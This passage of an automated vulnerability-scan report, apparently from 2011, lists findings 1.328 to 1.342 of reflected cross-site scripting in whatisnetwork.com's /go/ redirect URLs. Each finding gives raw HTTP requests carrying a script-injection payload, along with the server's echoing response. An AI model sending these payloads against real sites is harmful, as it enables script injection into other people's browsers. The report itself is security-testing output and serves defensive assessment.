Location: http://delicious.com4e29d\"><script>alert(1)</script>59e5c7282c5/save
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 801

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://delicious.com4e29d\"><script>alert(1)</script>59e5c7282c5/save" />
...[SNIP]...

1.328. http://www.whatisnetwork.com/go/http:/delicious.com/save [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/delicious.com/save

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d2cd"><script>alert(1)</script>3563da4cbe2 was submitted in the REST URL parameter 4. This input was echoed as 9d2cd\"><script>alert(1)</script>3563da4cbe2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/delicious.com/save9d2cd"><script>alert(1)</script>3563da4cbe2 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:33 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:34 GMT
Location: http://delicious.com/save9d2cd\"><script>alert(1)</script>3563da4cbe2
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 801

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://delicious.com/save9d2cd\"><script>alert(1)</script>3563da4cbe2" />
...[SNIP]...

1.329. http://www.whatisnetwork.com/go/http:/delicious.com/save [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/delicious.com/save

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fecbc"><script>alert(1)</script>2960b66f105 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fecbc\"><script>alert(1)</script>2960b66f105 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/delicious.com/save?fecbc"><script>alert(1)</script>2960b66f105=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:16 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:17 GMT
Location: http://delicious.com/save?fecbc\"><script>alert(1)</script>2960b66f105=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 836

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://delicious.com/save?fecbc\"><script>alert(1)</script>2960b66f105=1" />
...[SNIP]...

1.330. http://www.whatisnetwork.com/go/http:/digg.com/submit [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/digg.com/submit

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75221"><script>alert(1)</script>c7c97b99a18 was submitted in the REST URL parameter 3. This input was echoed as 75221\"><script>alert(1)</script>c7c97b99a18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/digg.com75221"><script>alert(1)</script>c7c97b99a18/submit HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:33 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:33 GMT
Location: http://digg.com75221\"><script>alert(1)</script>c7c97b99a18/submit
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 795

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://digg.com75221\"><script>alert(1)</script>c7c97b99a18/submit" />
...[SNIP]...

1.331. http://www.whatisnetwork.com/go/http:/digg.com/submit [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/digg.com/submit

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a52"><script>alert(1)</script>7b084e2cafc was submitted in the REST URL parameter 4. This input was echoed as 80a52\"><script>alert(1)</script>7b084e2cafc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/digg.com/submit80a52"><script>alert(1)</script>7b084e2cafc HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:35 GMT
Location: http://digg.com/submit80a52\"><script>alert(1)</script>7b084e2cafc
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 795

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://digg.com/submit80a52\"><script>alert(1)</script>7b084e2cafc" />
...[SNIP]...

1.332. http://www.whatisnetwork.com/go/http:/digg.com/submit [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/digg.com/submit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137a"><script>alert(1)</script>1df8144e26c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a137a\"><script>alert(1)</script>1df8144e26c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/digg.com/submit?a137a"><script>alert(1)</script>1df8144e26c=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:19 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:20 GMT
Location: http://digg.com/submit?a137a\"><script>alert(1)</script>1df8144e26c=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 830

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://digg.com/submit?a137a\"><script>alert(1)</script>1df8144e26c=1" />
...[SNIP]...

1.333. http://www.whatisnetwork.com/go/http:/friendfeed.com/ [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/friendfeed.com/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ab6"><script>alert(1)</script>9fc4f603407 was submitted in the REST URL parameter 3. This input was echoed as 57ab6\"><script>alert(1)</script>9fc4f603407 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/friendfeed.com57ab6"><script>alert(1)</script>9fc4f603407/ HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:44 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:44 GMT
Location: http://friendfeed.com57ab6\"><script>alert(1)</script>9fc4f603407/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 795

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://friendfeed.com57ab6\"><script>alert(1)</script>9fc4f603407/" />
...[SNIP]...

1.334. http://www.whatisnetwork.com/go/http:/friendfeed.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/friendfeed.com/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29144"><script>alert(1)</script>f27b5720864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29144\"><script>alert(1)</script>f27b5720864 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/friendfeed.com/?29144"><script>alert(1)</script>f27b5720864=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:35 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:36 GMT
Location: http://friendfeed.com/?29144\"><script>alert(1)</script>f27b5720864=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 830

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://friendfeed.com/?29144\"><script>alert(1)</script>f27b5720864=1" />
...[SNIP]...

1.335. http://www.whatisnetwork.com/go/http:/twitter.com/home [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/twitter.com/home

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a54"><script>alert(1)</script>e7c43f2bf2d was submitted in the REST URL parameter 3. This input was echoed as d1a54\"><script>alert(1)</script>e7c43f2bf2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/twitter.comd1a54"><script>alert(1)</script>e7c43f2bf2d/home HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:17:46 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:17:47 GMT
Location: http://twitter.comd1a54\"><script>alert(1)</script>e7c43f2bf2d/home
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 797

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://twitter.comd1a54\"><script>alert(1)</script>e7c43f2bf2d/home" />
...[SNIP]...

1.336. http://www.whatisnetwork.com/go/http:/twitter.com/home [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/twitter.com/home

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74706"><script>alert(1)</script>0b3b2e74495 was submitted in the REST URL parameter 4. This input was echoed as 74706\"><script>alert(1)</script>0b3b2e74495 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/twitter.com/home74706"><script>alert(1)</script>0b3b2e74495 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:17:47 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:17:48 GMT
Location: http://twitter.com/home74706\"><script>alert(1)</script>0b3b2e74495
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 797

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://twitter.com/home74706\"><script>alert(1)</script>0b3b2e74495" />
...[SNIP]...

1.337. http://www.whatisnetwork.com/go/http:/twitter.com/home [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/twitter.com/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e342"><script>alert(1)</script>c1b40b7eb84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e342\"><script>alert(1)</script>c1b40b7eb84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/twitter.com/home?8e342"><script>alert(1)</script>c1b40b7eb84=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:17:31 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:17:31 GMT
Location: http://twitter.com/home?8e342\"><script>alert(1)</script>c1b40b7eb84=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 832

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://twitter.com/home?8e342\"><script>alert(1)</script>c1b40b7eb84=1" />
...[SNIP]...

1.338. http://www.whatisnetwork.com/go/http:/www.facebook.com/sharer.php [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.facebook.com/sharer.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ead4a"><script>alert(1)</script>f86579ff6fe was submitted in the REST URL parameter 3. This input was echoed as ead4a\"><script>alert(1)</script>f86579ff6fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.facebook.comead4a"><script>alert(1)</script>f86579ff6fe/sharer.php HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:05 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:06 GMT
Location: http://www.facebook.comead4a\"><script>alert(1)</script>f86579ff6fe/sharer.php
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 819

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.facebook.comead4a\"><script>alert(1)</script>f86579ff6fe/sharer.php" />
...[SNIP]...

1.339. http://www.whatisnetwork.com/go/http:/www.facebook.com/sharer.php [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.facebook.com/sharer.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5976b"><script>alert(1)</script>4a818e65bfe was submitted in the REST URL parameter 4. This input was echoed as 5976b\"><script>alert(1)</script>4a818e65bfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.facebook.com/sharer.php5976b"><script>alert(1)</script>4a818e65bfe HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:07 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:08 GMT
Location: http://www.facebook.com/sharer.php5976b\"><script>alert(1)</script>4a818e65bfe
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 819

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.facebook.com/sharer.php5976b\"><script>alert(1)</script>4a818e65bfe" />
...[SNIP]...

1.340. http://www.whatisnetwork.com/go/http:/www.facebook.com/sharer.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.facebook.com/sharer.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b62e"><script>alert(1)</script>0e326af577c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b62e\"><script>alert(1)</script>0e326af577c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.facebook.com/sharer.php?1b62e"><script>alert(1)</script>0e326af577c=1 HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:15:52 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:15:53 GMT
Location: http://www.facebook.com/sharer.php?1b62e\"><script>alert(1)</script>0e326af577c=1
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 854

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.facebook.com/sharer.php?1b62e\"><script>alert(1)</script>0e326af577c=1" />
...[SNIP]...

1.341. http://www.whatisnetwork.com/go/http:/www.google.com/bookmarks/mark [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/bookmarks/mark

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a05"><script>alert(1)</script>77fe62c84bc was submitted in the REST URL parameter 3. This input was echoed as 40a05\"><script>alert(1)</script>77fe62c84bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /go/http:/www.google.com40a05"><script>alert(1)</script>77fe62c84bc/bookmarks/mark HTTP/1.1
Host: www.whatisnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 14:16:04 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.whatisnetwork.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 04 Sep 2011 14:16:05 GMT
Location: http://www.google.com40a05\"><script>alert(1)</script>77fe62c84bc/bookmarks/mark
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 823

<html><head><title>Redirecting...</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex,nofollow" />
<meta http-equiv="refresh" content="3; url=http://www.google.com40a05\"><script>alert(1)</script>77fe62c84bc/bookmarks/mark" />
...[SNIP]...

1.342. http://www.whatisnetwork.com/go/http:/www.google.com/bookmarks/mark [REST URL parameter 4] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whatisnetwork.com
Path:	/go/http:/www.google.com/bookmarks/mark

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c52e"><script>alert(1)</script>1704a0f5b4a was submitted in the REST URL parameter 4. This input was echoed as 5c52e\"><script>alert(1)</script>1704a0f5b4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

